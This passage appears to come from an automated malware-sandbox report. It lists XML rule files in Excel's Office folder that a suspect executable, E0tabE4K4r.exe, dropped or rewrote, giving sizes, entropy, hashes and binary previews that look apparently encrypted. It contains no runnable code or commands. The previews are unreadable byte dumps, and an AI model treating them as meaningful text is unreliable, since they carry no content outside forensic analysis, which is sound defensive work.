                                                                                                                                                  SSDEEP:24:xIVIKrCTdhX0sjfmkrEThsLRtEyiXVZAHZkltvrCrMc7UER5CVhxwkCr1cxf9deo:KVIKULmIEe0l8gtvS7Z/ahxOr1cheMD
                                                                                                                                                  MD5:26A45A84EA40C539A05CE052B7CAAB39
                                                                                                                                                  SHA1:3B71AF9CE8218F7105C3ADE44D0A99819FD62244
                                                                                                                                                  SHA-256:D6A22165B4A65678641238117EC7B4D638253FB9051517CAA737BA5B1E3DBE0E
                                                                                                                                                  SHA-512:533186C6618639C7DE4588BED6CE27C9992C86E75F87D430705AA7081070C6A6689E3A62EA76FF9DF228656D5403C01C30C6C64005B34256113A8A0B2EBD78B3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlL.O.a...M....N..#..Q..8_Z ..b..O.2"|...Bz.. s.C....uU..H.(.7G.A.n.oF....\........q.5.> R#...bg..e....bI.v..7q;.L.t~0...1...}.iAU\.z<.....V.....,.[...{.W....s.S.-ra..8.8.Wp..s.w-*!bpJ..^q.=...~.g.9....>].D..T...]...`>..3OG.. .....X.>..-..s...'@.45..c,..0q.4.]v..<.,.G.9>.n....5..HF..W.P...hz`{H.84Qa~...&c......wG.c!..]j..6.z..F..x.KO .U.l.Q.|.z...o.F..)|b........'h.V.(.K].Q....3P..P{3.>Vb%.0:32.-r.&...{.....SG...FI..+].Z.b...E........z.?Vk.w.mW.'k@.E...,.0...U......Y.4q.O.=...y..5.wlF..rP.:(.Y.h7...j.ux..zS.j.;Y..<...O0..@.N6.LQ.....W.C..TBD'.mnI.....\[.^.5T.n.F....Z.+.:......{|.."..{.C1.S]6..P5..M..JGzZ........W. ...9Q.../.o...\...D....~.t.-k.A-...E.0..;..@#,M.Y...YX.M.pS[Pk5ax.1..i.v.q_.V..Q..."....G....g.atLk..q...{^mB5.....h........`....&.$.U9..]....... ........\".FQ...8..LN,........S.....%....t.O....4 ./.__...4.23...."a..O...........Z.1&.W.)}.L.@...'.3h#<..x.4R.8.u.I.f}..H....M.......k...g.b...3DT.yj#..S....}+......T.. ..b....L.....d...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700601v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1734
                                                                                                                                                  Entropy (8bit):7.904780857806105
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:6G4wO6c063KSNWZUmtj07J8szx1Mwy+/y7SltD:6Gs6b63K1ZUmtY7PyeSSlV
                                                                                                                                                  MD5:6C36C2938D249E96E267C7CD687A4F48
                                                                                                                                                  SHA1:BA3F8ADBE9DBDD685D98BF44469FDDAB00C7D28F
                                                                                                                                                  SHA-256:CEB5F4DD5340F5314AC163975E5BC676253722DBDE7B67F7687B1389BF2928DF
                                                                                                                                                  SHA-512:5EC9D87250D80AA9786C6CBA7AF1A96101376CAF7A5909CD0E3C26965439B54FB1A07CABA03902AD13C0D03481D431F1FC856754BD4D13C62D46839CDAC55C1A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.[.v...I.VR....|1#".1.E@Fo.L._....U..v..9....*.%...^C....H.mbl......S+K.mo<F!S@...g.(.[.X.....Y.../_..{@...S...'......D.....m..{..@.Y.....R.>..B....7._....l..?.R..9&....v}.M.H...f.........H...U+t..]X.V..._.....g.2...e.".'.......M^.........]A.p......#....q..m..fM"<jj..^M.Q..>...,....'.......T.J.Z'.dq...@+.adpJ.e....H%Z.:J..Pe.%....]...tI>Py.A.p"..g....h;o...)~..@..@.x..3M...`V.>.i..Q.DW...R...X.......{..6..Z....#.+G.O'.f.adR....Q...>..t......8`X.....j8.W..i.6.[.)q.......^zD,..O_;K:..`*.C......x.z7r8.{.0...A..?..(^....F......:.....\.4>.h`).<..xO=m'.Jnl...V)0.."(O~i>.el...k...A.Lz.qJ.`g..Et../...sy...'r...s..q...........%.F.............B...%.$5..6.84R..[..X.A.....8X.G[.%0.1..;R..,..N...y...).s..../.cn.>D...IG....<.a+.y<...%.kYy...c.)'..O+aRK.O.X..h..H...w....w....;W.wx.....O..l.l..ui3.~..G.FI.....Eb...j3|......3!....CD!..g..|{.._${........JZ}....Y......2....]Q..@._I...B!.={Tc...Q........3......6QM...b..N. .4Z....q. .D..t.L......<

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700650v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1695
                                                                                                                                                  Entropy (8bit):7.859123522929805
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:ehXppHNCYT4dXIXCzlPGuekm41PFf+JycEDrD:ehbHNCWUXIeGu6419f+JyVDH
                                                                                                                                                  MD5:22B47CE7F23A032D18EBCF58B935A755
                                                                                                                                                  SHA1:C9BAAAF95D68D3FC2A5476644061286E954C867E
                                                                                                                                                  SHA-256:65E1203C67AB87933F0D0CE6EBCB43BBB3232CC1F227780FC97C6B6A8143885F
                                                                                                                                                  SHA-512:78529E45233A500A6FA8186D6CFB835D70F69F2349F74A7BDE03A765EBC99539BECC32CAD85E48E01D049A636B716033A16F4CF3A0426A1169432E93322B0642
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....2y..p.....D..pl..5.>/.....&d.k...w......|..*..p.(.[$..q..w...}.@"..UVi..~..o?0.@.....u...I......Y...Y{%U.d$....Sr.a....,...W.GR%D.<...W..Z._.=[.T.L.J.......qW.._.....;.9$....a....Ae.2....B.e...]../._$.MQU..}.~..Q...Xl...OR..@.+.\...q9..e.Li..#B..n....7.....MY....o...+\.x...x......]..+.[N7..F5%.iP.Q1......=S.{...e....g..i....u....F.g.6>.x..Rg..\.W55/.`-5)n.nt...FGuu...K..BTJ.o.3..`...R.0...3....R......"~Q.o....r.fm..n(.dj..%....c.L.g.7;~j.H....L4H.T..87ao...">&...tZEy.t}.b...G.c..PP?..."haKy...S..o.&..}n.O....L.....R..aT.7.C^...........J;..<sNeMN)..7...'.R.\.7...M.`H@JZ....hj...b|.[..8..xxC..%.-S..G0B...-.7I|.9s\....4j..W...A..hc<x........DBT.J9u.yc.v8l.{]..W<.._.y.p......B{....\qR.....l:.g#+....pP.f..,..Q.7u.u.[.$p:.*..[...5........I.p.>~#.M^..<U.7dN..w..93..1..=..0\..h....].]i.F..zy...@..&....[.U.b.....f.=$..hKu...,G(.2.~.'.>`..`........Gb(......Ya.._....~e\...<<T.C.6\D]..k.R%.W..S...J.U....r..?.....3..n..)..p{J*T..`....kI..V<n.S

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700651v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1732
                                                                                                                                                  Entropy (8bit):7.889720726020898
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:szSmrL4m80ffHxFDDAI1T6Rm39ELyQ8KlPD:oSP6fHTII12RmWFlb
                                                                                                                                                  MD5:501199CBB013FA5D8993DC94EE8066AF
                                                                                                                                                  SHA1:5E4549536F719800FE4545A70F410A01A9600438
                                                                                                                                                  SHA-256:A7EC343F408707BAE0D12E8524FDE8B41F080BC2A5BA398D6FA45A4BCB45F74C
                                                                                                                                                  SHA-512:95A47AC3644B6024F72709918FC0E7624C689764DEB976836B1736BF3FD6794264A7DAF2410059F8B2D1FEB6DB56F38BFC2D29E7B2E001FA034AC7C04E6F72CD
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlE....]D...$I...............&.%....OCzn0H.3E..\...TU.yG.wa...........B.)H.79.)..Q6$..,..7&.V.M...a:.........n.....p.."&..1.<.'.b1..\VQx..W..,...!..<r.:hA':".,.i.=:.D.*]LH6..6.p...K_.l.......2r...x.D....).LF..F.Y..^%..H......u..xi.X..#..|. ..6.....@..!:a:j..#...E..].PZ.a......1......vT..a#y.$.ej!..`.JZ....aa..*..4..t.....Q..9..!.. ....2.)...@..|.K._..^..S..H.8...g...g.K.....'b.}.*K..9..1.. a\.>Y....tZ..f2.j..lE.au.j..:...%....W...V...8.....E.Xc.cJ.1).%,...p.76.....\.]...(..".w(F.AF......Q.'..R...^....Jl..|..j.....P...(q&..;.L..`..........1.....0...2....N.h5K.D.U..vrX...}{.$....f...{..A.P,..S?......~.y.V.~{r...v&..=.;h@t5.@Q.......n.l.....Nt....Xq...Q....1rZ..D(...?......wm2.K.0...&.+.e[..........0...:NY.J..(....Kpb=s....FZ...L.'+..q.gS..]......L.T}.. ...v.`=3.........7t....x..BW._x/._.(7j.........k.bD)RAQv....$.'.p.z.J@.........gh...q....{..}..;.r..L..M....\s.o.0..[E.y......>}..5.r.2w..iR++.....r.(.X...:.G.B..+.MrW..Z.K..qA

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700700v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1697
                                                                                                                                                  Entropy (8bit):7.882712278214844
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:AUgvlFbKQDlBhouOTrhlYcgUjbwGOGIzb3wyQpD:A3vXbKQDDJWLgGSB/3wyQ
                                                                                                                                                  MD5:B3C2EB363519620B708A1C4772BC2CB1
                                                                                                                                                  SHA1:7DD0626517F3D872A1B9AD28D93455E3FD83DB86
                                                                                                                                                  SHA-256:C5E707ECEFE459199CA55B1EEDE4FF0B7D01E2C284B230E3779E8135DBB7C997
                                                                                                                                                  SHA-512:79C5DDED4744E7A0352A6DBEC8E2A74173806BE6BA4192E5F448299B84C82608AF2B6F11EBBDCC7875DF848EF10B59AA3C043197E8DCC4318565036CBA3984DC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.1".qa....X....ND.1.7>j.....p..5tDD...UF!..s.....0.....^.Y........_(so..8..|X...@..Fe._.X.>..)\.-..d#...2...+!...<..%..g..}p.{.V"*.......W.b...dot{..6...k.&R...J......'1.&...6....p.t.x.7.......S...)..3..LR.F....J..8UN..Mc].x.l.Ag9....@..;,G<y.io..c..H.O.1...*.X>O.~.....\.B....i;.~...0Q....Es.{....-,..b2z...~.K^P-.a..s....j..R...Q.R..y.H.Mhg\...[..3......b.*.`I...#L#U.Vx&.....k...v?..(..\Y.....f..+}-....B.r]...u.}..m....Sz..#..yj...;.O...6.......a9.!./..p..TQ..!k1..m..d..,(.....MQ`......'v.................l.cz...%.!.^&Y=.s&.l....L.S....*.}....TDC~........Ci....v...$F....9...w.\rS|]b}....=.....c...5...:/..?.^.k..4..G.*..Sh.},..x.qP.@J...._.Rz.@...c\.V+....}R..:D...y.%.S........ ..L`....0....$.>#.....C...v..VL.:..>.......vo.>....q<X+!..l....p'.!....s......|.1...\~&..!.@.b...5.;.V.p.*....G'r...R+..$.B.....9.~..U..k\V....3...g:.p.jV..m.I..;...u...w.t%..d......m.v.1.R>.....W.l.SF.X..V...Z)...q&.?..E...,0.WUO.]Z.!..I.`...%..(.X*.-...A..5.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700701v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1734
                                                                                                                                                  Entropy (8bit):7.896562238881741
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:bcn3fSUccKn9GtZPpBw/5v9Bc0c3XX+LJOAOQD:bCSJ9aZoR1BAXXgJOW
                                                                                                                                                  MD5:E9E15ECFEBCEE864EAFB72FEAE7942CD
                                                                                                                                                  SHA1:81DB5FEF58D9F1244B7BBF697F606E2A08014169
                                                                                                                                                  SHA-256:1790843C3F8B5BF931E983AE1FE8ABF77396548261274909692241C9649D9E1D
                                                                                                                                                  SHA-512:3EFBC8463BA232912D27FDF09D50E47A8BF2FCC90EAB0D91D73CE380057927967E45E009B3A1A9B95DDFBA88DC4CE51037E1976139DF4B4E97B49DC25B9AFE4C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml(...<$......k....Juw3...:.x..M.%...8I...7...=...)....Fh.-...S.}.vR. ?.^D..u.-"9.rz...d..=.BL.- .Z.36..j.=R../.%.2..S.|..\...|G.QP..?Af.....Y.3Yl/.H...l......]5..N.@..3.t..Y..+`N5.. ..,k........?....x.+.p.......-5.....jb ...d.Y .i......,>.U........g..N4..7..*Z.)...g..2...5..6T.W.6<u...*.?.l......-......PES.!......)...Su...]..i...GH.8.....>O.Cg7J.^..[|..#.........8..y.S....+5.........o.5.@w).[.4....'X..<.o{.UM..J-.Q.E..%.....S.}G,~.......L..,.y........8....R!..;.9V..Ocu=.y.UG...Nj..hf..*j.`.f..Z7IN.k.....37z.!..._...U~}E..A....<.../D..N.L...K.4....&U..Gb.gT..~c...6....?w...5..d{..I...U^......".~.W.u.#f..n...{D...8...Op...$....zYS.>.O................6.A.Y=.W..."..._[X...w].~.....k!....&^..".../.......X%.F..1,.8Y.!./4St[X........}.......>P..{i,SMLJ6....F..y.vma(.dC.O..x1.E.W......^........ wE.C.Qj...X.t;..r.PG.Y..O..0.T<..b..p.q.... ..f.7._.s..3.a.m.J...A.t..hKmE....:Du.fB(l....I..Gx.b.Fy=..Mx2O....Q~C.+........AC...-l....f..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700750v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1710
                                                                                                                                                  Entropy (8bit):7.891275366316677
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mDfdN0eN43EuYFwQxsJr6c7pM1/+yQTZa4QeD3sMnBZ0N8fxZxqGueHQ2bD:mTz0FjQxHWha4QeIMBZLxqGFjD
                                                                                                                                                  MD5:639B2A5B0F786FAB29CAF2A9305E5C27
                                                                                                                                                  SHA1:0182EAAF0CC44C691A11544CEC50329AC21E1C88
                                                                                                                                                  SHA-256:ED6C664A5D32E5DF810CCD3DBF7E90204AB8BD484B0F460287692297828F11F4
                                                                                                                                                  SHA-512:24BE3541C2E296B74F952350198EA219B445978B48F36B9CEA86B141A2B949C137CD9E4CBAE260643A9CEC363586F86A93121A8471EDDF0946444021F3E5A075
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..A.........^O;...:._p#...$.#Q..x........m.r..i.@G(S.2.P...P...l......~...8.A#.....}dJ.....[...w..N..[/...7BmF.,..w..f..T..R....o0*fI.9.09g.`.e..!...P.+....... .(.........$_;..CF....../..u}@m....+.U)f3...>./.ogq..v.O.|........1......2.....4.......i...9..ta....E..&l..?Z.O..p...t.X..Z^..G..6G@No....D.#%.r..fu..8.-.S.3....:.8;.A....O.#....R.S3.........ZW...M}..Yz.MI....hp....YB...X...."...a..G.l-...L#.h..k..w.J.i.u.U.H..'/.?VmW+.E.<...RU.@&2NW.f.$...:...$......q\.d.a....5........u..TX...nz.R..X....3u.;0.v.v;CR.%.@...Z.....;.`..r.qKs.LE.(._.5..n^.~..ST.(..B.W..mK).....#.&4.qc.ld..".O*c.>....$..-.hh?:..F.).r.Ys..*Cb.X.M.;......-.\jq..9@ .w=.x..w....k.rNjL.a.V~-....H.q.9..v..S+&9 J q...}.E..!J.,......<..L.k...I.P.;.2.5......5.:.K.:.k....L.}G.=..>.H9.1.........[..F.^"..s..>......(7.e..VNu..Y2.j....#rs.u.o..k...~.W...p.....5.D.....6..5.]az....a..(..........CT....{..61'".>T...!9......K.P..U0..........:.....'(.=.K.G...`.X.M6..?;v..u.I...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700751v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1747
                                                                                                                                                  Entropy (8bit):7.8829007500514345
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:1nXvEsRJf+gH8D4wwBUbLS2QdHV8OTZD/3qD:JXNJGgH8swGUbLS3d1Rvi
                                                                                                                                                  MD5:2CF397A0DACABA7DA7E50BF4A4766119
                                                                                                                                                  SHA1:F4824DABA37C14E0D15D990F6A51E14321ADA61E
                                                                                                                                                  SHA-256:684CF2887A3650BECD77F2888D5C0526591EAF298C3EBC8A28D19ADF249B5210
                                                                                                                                                  SHA-512:027F35F0D408FEF0722EA0F20D8A448928AB862DC668CAF272770F14231C3D4114F94BD2B6E8023C1AB4A47D1E3A117C0188D2AEF621FCE22EE58A694D63CC06
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.^#<<..O.<..u......W$S}....2...k.a'.p..:.<..S......:./....%.M.L..c:.G.a...%'..........#..@4j..N......dF%.v.p1.|....&3.5pU.6...O..!.Q-..Q....c%..^#Y:....5.,.....4..{...0......k.)...F...&3o....)..=<1..@)../3A_x...V.I......5.....x..a.2.".\.0% .<Kx.R.....+..z%.q...NkQ....B...w&.rgX{.[+.^N......z........R....'..a`....R.BhH......BA.SRu.|.Z...E0..8...N..e.Z....H.",&y.G.^.7KF...v.w....8.\J..%.r...lh.9r......]2.^$...?......sk..q.Q..eU......w.}... ...J[..4..kc.V......z{..n-....\.*.n.tGF..7...dr.f.K.....$AC.@.Ne..n..Ce.B..>./1.....%.l\.68u_M..E...'.._[.[-..|_..Q...".9.j.u.0....g..:i.p.+...6d.^.Gk._o...}`H..34..H]8.......X...K........bK.!)..JO.7!{.8...3.B..F[i.F.<.)I.{.]G*.A\.o6..k.g<..l.F(2..Q.Z..s..fY."t.WA)..h$7z..2....T..?-|....T....vUW.x..C.........9..h..[#..*Y.9..|.w...J..v.v....(.2....bF..M0=.H........!....l..$...C^r......t.( ..i_..}.....w...Bg0lZHnr.....O.E.K...a........+q...b6.ea.D%AH..t..(..VS..C...1..........aI~....^(.4.J......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700850v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1711
                                                                                                                                                  Entropy (8bit):7.887217037300441
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:9pou7i6A0Wt8PnmIMzn//cPLGiNm+sq+o12aqzFTAscB86bKo0KNrZkomHbLCgAA:XourWuvmIMLsG4Yjo16ErHZMbJD
                                                                                                                                                  MD5:97E101B4619D5E218ECE883368E7BCB4
                                                                                                                                                  SHA1:021F2CD537D4133BBA2F11FD7DA2F83A5185347C
                                                                                                                                                  SHA-256:BD42780AEF7AB6FAC49A6729F282468B4FEF2BCB954F9EEB052D3ED2B1FA4895
                                                                                                                                                  SHA-512:FBE7F88A002AEC6E680065709E2EEBF79742088D5256D1F0C2D1221E2125132AA1058DABCAED2FA9B0AB4FDE2E6A8A4B373AEBA311F648FD0BB816CD3B8D212A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..].{...W.'..a@MvDY.y.,..(...g...p7.dR.I...q..,N...t v..........ny.08.(..............F.I...i..S.w...c.].GB.F.>......"jM.#.gkR....@$..>{m7._.*.......o].D.d..ewt4`=..e.O#.1...WgA+G...-d./....HS...kZ.,..u.wk.&+.At(M..W.N...Ct.Eay.nVj.(8..s...|'U.S...R..Fbo.....}...%.R..^..x=._..fc.1..G..Z.|..!U.s!N.~..St~.....]2..F....O|..Z!...>..p.......p...sP..)...}:Y!.S...(X..m..ekb8._Q...g......v-P.....w...z_...|..C.....].!@5.H.@..Uo..0n...\...M....g.:V......-n..-(.w.f.#.4.....:YU...=......4.i*+...........x..@.X..#....-.>.(.H.k52...(...!ii#.X......p.".].mj..u...^.....l{......6.e..>z...$.....A....Uw.!.... ..=.....L......./Ny...$}~...`H.u....d.........v{.BF... ....!...W..w)..Vb4....,.=^/..D.C.b^.(.O...K=...<.\..km=.Z...'.V.}:.O..i....K.o.9.e...3........ow.M ......E..4..O....%.%&(......{.Xc.]:[.....i./(8..I.{c....$|....W..+!a..[.?.....rT.V.d3E.t..7&.{....G.._. ..Je...m_.".).4....8.@.........p...TM9.;..T...'>.;P.s."..*TK-:.=kt.I....Jc..j...;...'....i.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700851v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1748
                                                                                                                                                  Entropy (8bit):7.884937414997457
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:vN9j5fKdOhEKu6g986R/C4KBdVxkGifi8bD:vDj40hEKunBC4KBbxkGifi8X
                                                                                                                                                  MD5:77DC0CF978C9F5CE417BFAD529C24A20
                                                                                                                                                  SHA1:569CD43E9CEDDF648EF5E9953D2BE602C5F3D696
                                                                                                                                                  SHA-256:8B152C180A55909807D839D82E7DFE761DE0F5906395A7B3242628A1F3E01FBD
                                                                                                                                                  SHA-512:DF3E2BFEAA80F19A977D6976496861359F39B9BCD79169FEE97B8FE7B1F8F5B0283DABB0C42E4C8BDC4E3A790BDC436F22D104904E4ADFBE897F010D3315C1FF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....`...v...+..(.V;.w.x....*.P;% .f.....-..9;e7.."...'+....D.*....b...!OG.....q.....&......F.:..O.G.n.`w....d.P&....Hkc.{...H...:92...qS;....L..'.20....B.S.{Z..my...e`....._?....3.a...{..i..L....km...w...(.h........r+.|....k...=:.R..8..T...A...e. ...-...}}i.#&.F,;....L...`.K/.<..H..C."....N..S..H'.(l.`..M.....Rac.TB..A...L.z./KJ.....X........^oCI|x.q(T....C.R..O^.e{nW...+fHJ...&..-.9P....q.pU(.5.^f.K.]..s&....(...6.,q..&....].a.........r...N...... .....q..USxhv{....X..*.H.<{.._6..e..q.V..T..|bt.....0m....l.?).7.\4.......J%.#N....3.zO....z.!.G..M..I.........j..-...iQ_....L._el.._.l.j..%...o......6... .{A..sD...9wsC...g ..<'V.s.........}...:.....x8.%ap.z.8n-:...&....o&9..*.I4....VIn..<...1..........%....&....W(5....qp..?.#C.J[..6w....)..V.).1..E..e3.....2..(.`....2.=.;..J..kO...../.LBY..e.#..%....a1....-..L.........9..X.]^..b.MFO.|...z..U.!.K.C....p..<..'.c..C..K..).-@w.iWR+F......b...1W{.\..)..~.....i.jJ.....&..f.,x0..M.n.)......w\.3

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700900v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1704
                                                                                                                                                  Entropy (8bit):7.883933016755819
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:wVsQHLwhSIhf/oOihYQTu/tdEnAmRxAXkC3P1rD:w1IGXYQTu/tcXCdH
                                                                                                                                                  MD5:03025C4DB805088D1C4D201B3C8C6058
                                                                                                                                                  SHA1:85F13A0ED2037B7AAD63FA4E17A9F7C3FFD504CE
                                                                                                                                                  SHA-256:E601585E336BE63B08AE6AF94B7DE79D12DF3306F710A717D6FCC01AEC44E9CA
                                                                                                                                                  SHA-512:03B651EDA37F76FC296D3D5EFF863F5D4D3ADD892A18587AB7A048575EE65AF10A5FEF43355D60D32601F4304F811AA151EFA9C93057384E26C86D647E4D3DD5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.9.......h.H.be..r..W%WU..x..Eq_..D......M..5...8...].t..w..Z....&.h.....h....$e$.\.&..X..u.....f........B.jf.'..y.u.....zV....Q`....Pi...b.....%......Xv..j.*Fo.8n.p.+. S.h6.<.C\......U.~.}'p.....]..8......s..W.....emp{....d.?-...x.q...&..&R`-U.._e-^dl.....&$....(.L...t.j{@.@.h[...h.....v.y...4..R."!.nxY}..=ftD.g.F4a......~...u..h.@m../.....4.e._.l"r.N[\.\...".C...T..=..@..f.v....n@.A..RD.TQ...hj-'..2..._e...+.. .Z.Z..q1=.".Q.'.<+9.#L<..k. ..+.,g5...B_..V.....C.!P..{..x.K...,.].o@..Y5G..).*>..I.Bb..W .l...nx....4K9OwQ._lA$.}...j...................|....x..u9ZX.OG...5.z...0.Wc...E._._.\...j^.}.......m.7........@.....c...Zo.y1..{M..P.2`..F:E.Y..O....\..SH....AN..S.["[.+w.}..b.I'.*.%.(..T.@.....qtvv.\....;_...!..<...^..s..c...F..TJ...4M.N.|..A.e.9.=-RQC......~H...J...R...........|..?6..$.y.~|A%.wk]P.4.soM..7..S;U_.s...m......T...0P..1..N.\........}....."...;......O.?..z2.D..km.....a.r....j...n...PH.m<..\y.9.=..?...Y`ts.qR5..&.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700901v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1741
                                                                                                                                                  Entropy (8bit):7.87520518242984
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Z8JlZcmlGzLRHjHMlGlt++fSoCZ1dTFnsCgGUUpyD:ZIlZXsLhbSWt+YSLZ1ZBVUJ
                                                                                                                                                  MD5:7AF2CB8D39005F7E04F3935449066DC7
                                                                                                                                                  SHA1:A0BB76ED3BCC80F24D944B8691EDEBBF527FEC35
                                                                                                                                                  SHA-256:9C9E45962D937EE43F132B06B5DB49B07A0AD3FAC5565459ED8FA07936384F4F
                                                                                                                                                  SHA-512:51C0ED0F75EBA175B0AB3D54BC4C18DD1F48A2C3B3A5D48E83C2527533C747CDB6C472B4007A4C2A72C0704919A2FDCDCF021FD3B8253AD262332704D07A13ED
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.|C...%../.`.jP.?O.5.....3...0.g...Aw.a.L.<>.....".*s..t|..E...g..9.Q).A...$S.k..=.(.z.83.a.3.[X..u[.0.s....y4.anN=|..a'1O>.....?......Qj.r..(...>I..D.{I'?y@..>..,F.b..^h."`...r....mM....../...`......_....~.y.....Y.M...../.z.....Z...]/.i.*.....].... .B..2z......s.&J...N....JB(..a..@..kaj/_.E7.....e<.w..).#f.4_.+@B....l.U.n<...]...d.!...V.V.m~p"..V.G......I.1x.z5.z.....y..0.k ....}2l.*..U.93.8h. !.Y-i@..3..b....M.U...u_...... Y...=..4.K..%r...]}..CG..9.m>.Y...v.!6|.x.....B.....ZF....BB....B....(w...2)/.w.2..^L_.5n..lNjG.....k.J0....Ga.Hh..<.."u..4......|....L......-.Q....l..f5.XYE.e.$.../...........D..S..n.dH....M.M..GO...[.Mdy.... ...Y..*.K...c...Ok|.1..$..W..I{V..".v...q.<.YR..g..KN....g..5..c..>......G.c!1..H.....}.S0.~...aQ.sgrB.'Lf.......[..X......=d~.S..2..8.E2.C..._..M`.S..&O/{.z.....X...%...c...f_.X.......Ba}(....y..8..-....g.7...J.`Q...|.|..LW..T.Z.3..y(93_$.y*.T..g..[fZ.+!..0."..V.A.~..bR .xQ......@..m..[..._.M.g.......EIM..0

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700950v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1702
                                                                                                                                                  Entropy (8bit):7.9009293145258574
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:WB5IRWXtyWMabq79TKglT3MnokrE0NxWHzBCbD:mOQAcgRKglrcoeE0nWH8
                                                                                                                                                  MD5:6EDE38B3F98A72E371E9C2B15F71DF95
                                                                                                                                                  SHA1:C81D43D62BE1D804E70244E3C290F29DD4D2FE16
                                                                                                                                                  SHA-256:D7BAE1EA8A700F136F3E430375C61CA15430DFA0E3349F9CD09EFECB4B107DEE
                                                                                                                                                  SHA-512:813C41CEBD65706D9D66536DF6D4740F5C2EF6846CDACD2858607660EA69EEDF0A3CE9C24B21333C8F906C561C7E2620CF680312544DDF989D1FE677C3FD04E0
                                                                                                                                                  Malicious:false
